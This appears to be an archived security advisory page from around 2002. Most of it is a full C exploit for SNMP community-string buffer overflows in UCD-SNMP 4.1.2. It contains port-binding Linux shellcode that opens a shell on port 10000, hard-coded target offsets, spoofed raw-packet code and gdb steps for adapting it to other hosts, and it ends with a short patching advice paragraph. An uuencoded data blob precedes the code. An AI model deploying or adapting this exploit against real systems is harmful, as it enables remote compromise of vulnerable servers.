MX,L/9:EV>P\\GH:&2R,W1>]GH3WPLK_F7/SG?!R.,$;[[DW,-VN\'N+L5*H?#9
M^0?PV_[DG**#X?REX>R[@T\'SH.\'L\'>=7$TFN7]$]%H9Z!L]($00D@F_\\]!.&
MQC#(LBXL\'@:+.QI[<C?$?URWTVLL/B_TY&QZ:.U,M`P^*-&]O1+]*^Z0ZD&N
M_;;1/II<#:62TP;&1]A!^/[X7S<T?.?_+:4F\\`\\Z$*C#7W8WUCRS9EIPLR5J
M*_UGY_7/G:R7UPLLSPT>U?L0,W!\'SH_0L[-WKV].K@[/KYSSZ70I]P!JSL=X
MN@13SOWN$!Y@SFD?\\\"0<CT#VQU\']QR\"=!H_@CUZ_N3ARFB!DW\'JWU6IWZX.\"
MV>IF_7CK)S,P22;`N_$DXCX<7U\\T7-JO4[#DC58\'T.H[&#XHK7_QEW<S4%#K
MYQ/L+O(I_#1R#Z?2C+T/-S^6+;4:E>MYK5:]W>K46P6CZN5XD+?5C\\\'M\'@_K
M;1A]DFM\'MHFD(@\'9[0@,,(/\"E5MX\\`CQ#[ZJ&3M[6,JCJQQ_LL5R+:C4?L>\\
M2P)>VR2*I_%8+#*:YG6SR1&@A^!V=6_8/ZW9(\'UC<G`P.!GXO,S-%=]O2FW;
MFHQ5/?1WYV^V=1(VQ%0(Y_IH_K*FBX-<%W^,D^E(^B>\'2F)6;^A&&H+SE#0F
M00.%^7\\GT!RV_8\"TD*MTK[8]N%;4N4VCGR734P_6R)UU.:D;?UXS?:ZIB\\4D
MX68WF;%%WZH&[%0LLAVHOO<H_%S/<H:-KX[E3^?XR/DARYI\'\"_::S$)*3L:U
M-.V*J]?\']ETNV\"+3QS3,4FZOWE_>7%[GH]UL#M8X`&<DZ?.]J50UJ%-3B8?R
MCISX(/<A;*`LTF\\F[))YK[M/1%`@Q%,$TU\'6OYKXHD4&R[.Q?$!;\'?SWQM`_
M5\";RX21^6,2\'8!\"\":&O6F^UL/2J\\(Z?.F_H+%L>/X/O$#Z7Z2_O5CUC1H3R`
MMD%UPI]#NBEVB#2MO53ZC<U]?<0PV`D&*)WW,9IES@-6G^9#0>::W7L/NUSN
MQQTF1+S4\"`K?*AX%3G1=(O66F(]C=N(F%`)/_T_9440/=W121+L_\"AY`PR_(
M5H6^\';K-9AO^ZZXJU/*O%8Y#&`4=F68M$_[7PG^EET\">OT,]2EVAOPYG(49D
MXKO%H?>)!.[J`*J]JI,N-DFKVU5I=9M)JS=\'SOM@2K?>Z$+<-=W%R8DH.N4*
M*(K\'VER\'<(S[.YA>[4LP@Z8.G7%,0EZRKWI#WBX?.9FOT0#YVD/B,UI7`\"S$
M1V#D/8.E2/X\\\'AA(\\%X.\'AA,U)%L%B<[>BN0906Z(\'R82NBWX,ML<M^\\O3SY
MEW_]<`EKOT<V$&CG3]C>6_\\V5=>C4[\"Y4*N>)$\'P:?_]`:<VT$1D$UN3B_8D
MI\"5SU@G$34CUT0LR\'8;J;Y=C%8<+$^\'\',8=UD4I.GC=`T.$LX9GZH^/6,!><
M3T:SNP^DCNCHL>;<>_!/JR91%22H)EY>HQND[RXOX%G\\CU?3<=FK!&^Y)V@6
MU9S5*<\'D&:8(V@4,>.P>@:]QG(SB:.J.!+ZDC%!]#HLWN8Q9-]:P>,/!1*1W
M\"UJV%(D6;*S\"1TPI8*XRF\\^X;C!(3`W\'!/J43JDHGP73.4BV\\4\'.<A&CV<CW
M[\'G@/(-JJNF_W@E+$_R[)=>859(-QWF0(N;X<&XTD@D^3WQPAL)[.G.BE!^^
M_JS7GM2\\,KPH(JSA93/U#^ND5@1W$K#4+(P03J#A7.*!6!]812\\^\'?G)N9OF
M@WD\\7X+69TIX!B;DX\'/]_+R&],(Z<HDU1CJ\"$50%VL)RO,OWH#XL5-C\')HCG
MF`\\I9H50,N8)!;`Y4GD]3,+Y0BYZ4D*2/XW57:V4?J0)D0.9;+?=!%/T7%B<
M4^#P_/\"2EA9=%JE\\F.<[D*@W6JQ>R56).0@I-.?3US]OR;BK>MDMNP\"Y]YJ^
M0?:L3$4R_$QB_!51*TC\\^X7,W2MSC.GB<4K\']*]_IB0&S*+\'R3JYOO:`P>@T
MM^\'\\&]HLLE;``.,)\'V;QH2]>%I!3L<4OA%9S*(`B?[YYAQ/Z_P%02P$\"%@L4
M````\"`\".BDTL>B:5QI%6``#=>P$`(``````````!`\"``@($`````4%)/5$]3
M(%1E<W0M4W5I=&4@8S`V+7-N;7!V,2YH=&U02P4&``````$``0!.````SU8`
#````
`
end
Update (14 March 2002)
======
Jove posted an exploit for UCP-snmp under Linux (slackware 8.0) :
/*--------------------------------------------------------------------------*
* Exploits bugs in community string overflows for snmp implementations *
* Coded by: Jove (jove@halo.nu) *
* Portions provided by: RPC, and Zen-Parse *
*--------------------------------------------------------------------------*/
/*--------------------------------------------------------------------------*
* Explanation: *
* As found by the Protos project, many implementations of SNMP are *
* fallible to overly-long community strings. In some implementations *
* it is possible to use this to take control over the system snmpd is *
* is running on. This program is an implementation of how such community *
* strings might be used to take over said system. The framework here has *
* been designed to be extensible to encompass exploitation over multiple *
* snmp implementations, over multiple architectures, and with the *
* the possibility to evade IDS implementations. If someone does extend *
* this code through targets, or actual code update I ask that they share *
* it with me (jove@halo.nu) and all persons involved if they wish can *
* share with others that send in code fixes so that this exploit can be *
* fine tuned. RPC provided the framework for which to send the packets *
* that is used with slight modifications by myself, I extended it into *
* this exploit which is much more extendable, and has a working target, *
* made it easier to use and nicer to look at, added support for multiple *
* targets, and ripped out ugly things such as globals. Here are some *
* instructions to get it working on your implementation of ucd-snmpd and *
* others that derrive their snmp parsing code from ucd\'s implementation. *
*--------------------------------------------------------------------------*
* Required values for successful exploitation on x86 arch ucd-snmp: *
* 1.) rets_position *
* 2.) ret_address *
*--------------------------------------------------------------------------*
* Easy way to obtain 1: *
* A.) Run GDB with the path to snmp ie: gdb `which snmpd` *
* B.) At the <gdb> type run *
* C.) Run this exploit against the host with snmpd running on it. *
* D.) GDB should error out saying Segmentation Fault with an address. *
* E.) Take the farthest right hex digits and convert to decimal. *
* F.) This will be your rets_position... if the buffer is bigger than 256 *
* you may need to multiply it by 0xff X times where X <= bufsize / 255*
*--------------------------------------------------------------------------*
* Easy way to obtain 2: *
* A.) Run GDB with the path to snmpd ie: gdb `which snmpd` *
* B.) at prompt type break _snmp_parse *
* C.) type run *
* D.) run exploit against system running the snmpd you\'re debugging *
* E.) when it gets to the breakpoint type print &data *
* F.) add about 100 to this address and you have your ret_address *
*--------------------------------------------------------------------------*
* The methodology for anything other than a linux running ucd-snmpd is *
* beyond the scope of these comments, and I refer you to phrack 49 for *
* more information. *
*--------------------------------------------------------------------------*/
#include <unistd.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <sys/types.h>
#include <sys/socket.h>
/*--- Local Defines ---*/
#define ASN1_SZ 11
#define ASN2_SZ 36
#define HDR_SZ sizeof(struct iphdr) + sizeof(struct udphdr)
#define PACKET_SZ ASN1_SZ + ASN2_SZ
#define MAX_BUFF 4096
/*-------------------------*/
/*--- A structure to hold exploitation values ---*
*--- so one program can exploit multiple ---*
*--- targets. ---*/
struct target_os {
char *description; //String description of OS.
char *shellcode; //Pointer to shellcode for OS.
int buffer_size; //Size of buffer we\'re exploiting.
int rets_position; //Position in buffer of value that the snmpd will use as a ret address
u_int32_t ret_address; //Address to have function to return into
char nop; //NO-Operation instruction to use
};
/*-------------------------------------------------*/
/*--- asn1 gets inserted before our communiy string, ---*
*--- asn2 gets inserted after our community string. ---*
*--- these values were taken from RPC\'s code. ---*/
char snmp_asn1[] = \"\\x30\\x82\\x01\\x23\\x02\\x01\\x00\\x04\\x82\\x01\\x00\"; //11 bytes
char snmp_asn2[] = \"\\xa0\\x82\\x00\\x20\\x02\\x04\\x57\\xc6\\x36\\xf6\\x02\\x01\"
\"\\x00\\x02\\x01\\x00\\x30\\x82\\x00\\x10\\x30\\x82\\x00\\x0c\"
\"\\x06\\x08\\x2b\\x06\\x01\\x02\\x01\\x01\\x05\\x00\\x05\\x00\"; //36 bytes
/*---------------------------------------------------------*/
/*--- Zen-parse\'s port 10,000 port-binding Linux Shellcode ---*/
char zenparse_code[] =
\"\\x31\\xc0\\x31\\xdb\\x89\\xe5\\x99\\xb0\\x66\\x89\\x5d\\xfc\\x43\\x89\\x5d\\xf8\"
\"\\x43\\x89\\x5d\\xf4\\x4b\\x8d\\x4d\\xf4\\xcd\\x80\\x89\\x45\\xf4\\x43\\x66\\x89\"
\"\\x5d\\xec\\x66\\xc7\\x45\\xee\\x27\\x10\\x89\\x55\\xf0\\x8d\\x45\\xec\\x89\\x45\"
\"\\xf8\\xc6\\x45\\xfc\\x10\\xb2\\x66\\x89\\xd0\\x8d\\x4d\\xf4\\xcd\\x80\\x89\\xd0\"
\"\\xb3\\x04\\xcd\\x80\\x43\\x89\\xd0\\x99\\x89\\x55\\xf8\\x89\\x55\\xfc\\xcd\\x80\"
\"\\x31\\xc9\\x89\\xc3\\xb1\\x03\\xb0\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x52\\x68\"
\"\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\"
\"\\x0b\\xcd\\x80\";
/*-----------------------------------------------------------------*/
/*--- Function prototypes ---*/
unsigned short in_cksum(u_short *, int); //Standard checksum calculation code
unsigned int resolve(char *host); //Resolve\'s a host, taken from RPC due to laziness... ehrm efficiency
char *make_packet(char *, unsigned int, unsigned int, int); //Creates snmp packet, by RPC modified by Jove
void usage(char *); //Display\'s program\'s usage.
/*---------------------------------*/
struct target_os the_targets[]= {
//description, shellcode ptr, buffer size, Position of ret address, Address to return into, NOP to use
{\"UCD-SNMP 4.1.2 / Slackware 8.0 src compilation (bindport 10,000)\",zenparse_code,256,216,0xbfffd77c,0x90},
{(char *) NULL, (char *) NULL, 0, 0, 0, (char) 0} };
int
main(int argc, char *argv[])
{
/*--- Constant definitions ---*/
const int one = 1;
/*---------------------------------*/
/*--- Networking Variables ---*/
struct sockaddr_in sin;
u_int32_t addr;
int sock;
int src;
int dst=-1;
/*---------------------------------*/
/*--- Exploitation Variables ---*/
char buf[MAX_BUFF];
char *p;
int ret;
int shellcodelen;
int retpos;
int buffersize;
/*---------------------------------*/
/*--- Option Handling Variables ---*/
int arg;
int cnt;
int typeosys=0;
int debugit=0;
int port=161;
int echo=0;
/*-------------------------------------*/
if(argc < 3)
usage(argv[0]);
src = resolve(\"127.0.0.1\");
while((arg = getopt(argc, argv, \"es:d:t:x:p:\")) != -1) {
switch(arg) {
case \'e\':
echo = 1;
break;
case \'s\':
src = resolve(optarg);
break;
case \'d\':
dst = resolve(optarg);
break;
case \'t\':
typeosys = atoi(optarg);
break;
case \'x\':
debugit=1;
break;
case \'p\':
port = atoi(optarg);
default:
printf(\"Invalid argument, %c\\n\",arg);
usage(argv[0]);
}
}
if(dst == -1) {
printf(\"Missing destination address.\\n\");
usage(argv[0]);
}
shellcodelen= strlen(the_targets[typeosys].shellcode);
addr= the_targets[typeosys].ret_address;
retpos= the_targets[typeosys].rets_position;
buffersize=the_targets[typeosys].buffer_size;
if(buffersize>MAX_BUFF-1) {
printf(\"Must increase MAX_BUFF define to something >= %d\\n\",buffersize);
exit(-1);
}
memset(buf, the_targets[typeosys].nop, buffersize);
memcpy(buf + retpos, &addr, sizeof(addr));
memcpy(buf + retpos - shellcodelen, the_targets[typeosys].shellcode, shellcodelen);
if(debugit==1) {
for(cnt=1;cnt<buffersize;cnt++)
buf[cnt]=(char) cnt;
}
buf[buffersize] = \'\\0\';
p = make_packet(buf, src, dst, echo);
/*--- Create the socket to send data on ---*/
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(sock == -1) {
perror(\"socket\");
exit(1);
}
/*---------------------------------------------*/
/*--- Setup the socket\'s options ---*/
if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) == -1) {
perror(\"setsockopt\");
exit(1);
}
/*-------------------------------------*/
/*--- Setup the Socket type/dest ---*/
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = dst;
/*-------------------------------------*/
/*--- Send the udp packet and error check ---*/
printf(\"Sending Packet...\");
ret = sendto(sock, p, HDR_SZ + PACKET_SZ + buffersize, 0, &sin, sizeof(sin));
if(ret == -1) {
perror(\"sendto\");
exit(1);
}
printf(\"sent.\\n\");
/*---------------------------------------------*/
return(0);
}
void usage(char *cmd)
{
int cnt;
/*--- Print out a pretty usage and exit(0); ---*/
printf(\"Snmp exploitation utility, Version 2\\n\");
printf(\"Coding by Jove w/ segments from RPC\\n\");
printf(\"Usage: %s <options> [-d destination]\\n\");
printf(\"Switches:\\n\");
printf(\"\\t\\t-s <IP>\\n\\t\\t\\tSource address to use.\\n\");
printf(\"\\t\\t-p [Port]\\n\\t\\t\\tSpecify port to send to.\\n\");
printf(\"\\t\\t-e\\tDestination is an echo server (to bounce packet).\\n\");
printf(\"\\t\\t \\t(Source and destination are reversed for echo mode.\\n\");
printf(\"\\t\\t-x\\tUse an ascending value buffer for the community string.\\n\");
printf(\"\\t\\t \\t(Used for finding values to use w/ this exploit.\\n\");
printf(\"\\t\\t-t#\\tSpecify a target to use for packet creation\\n\");
printf(\"\\tAvailable Targets:\\n\");
for(cnt=0;the_targets[cnt].description!=(char *) NULL;cnt++)
printf(\"\\t%d- %s\\n\",cnt,the_targets[cnt].description);
exit(0);
}
unsigned short
in_cksum(addr, len) //Standard checksum calculation code
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
unsigned int resolve(char *host) //Resolve\'s a host, taken from RPC due to laziness... ehrm efficiency
{
struct hostent *he;
unsigned int ipaddr;
if((he = gethostbyname(host)) == NULL) {
/* ip addr, or invalid. */
if((ipaddr = inet_addr(host)) == -1) {
printf(\"error resolving %s.\\n\", host);
exit(1);
}
return ipaddr;
}
memcpy(&ipaddr, he->h_addr, he->h_length);
return ipaddr;
}
char *
make_packet(char *buf, unsigned int src, unsigned int dst, int echo)
/*--- This code has it\'s roots in RPC\'s code however, --*
*--- Jove had to modify it so it didn\'t use globals, --*
*--- so buffer size could be dynamic, we seed the --*
*--- random number generator to randomize the ID --*
*--- field. --*/
{
struct iphdr *ip;
struct udphdr *udp;
char *p;
int bufsz;
bufsz=strlen(buf);
p = (char *)malloc(HDR_SZ + PACKET_SZ + bufsz);
ip = (struct iphdr *)p;
udp = (struct udphdr *)(p + sizeof(*ip));
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->tot_len = htons(HDR_SZ + PACKET_SZ + bufsz);
srand(time(NULL));
ip->id = rand();
ip->frag_off = htons(IP_DF);
ip->ttl = 0x40;
ip->protocol = IPPROTO_UDP;
ip->saddr = src;
ip->daddr = dst;
ip->check = in_cksum((char *)ip, sizeof(*ip));
udp->source = echo ? htons(161) : rand();
udp->dest = echo? htons(7) : htons(161);
udp->len = htons(PACKET_SZ + bufsz);
udp->check = 0;
memcpy(p + HDR_SZ, snmp_asn1, ASN1_SZ);
memcpy(p + HDR_SZ + ASN1_SZ, buf, bufsz);
memcpy(p + HDR_SZ + ASN1_SZ + bufsz, snmp_asn2, ASN2_SZ);
return p;
}
SOLUTION
All vendors are releasing patches as time goes on. You should consider
disabling SNMP in the mean time, or at least assuring it\'s being
firewalled.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
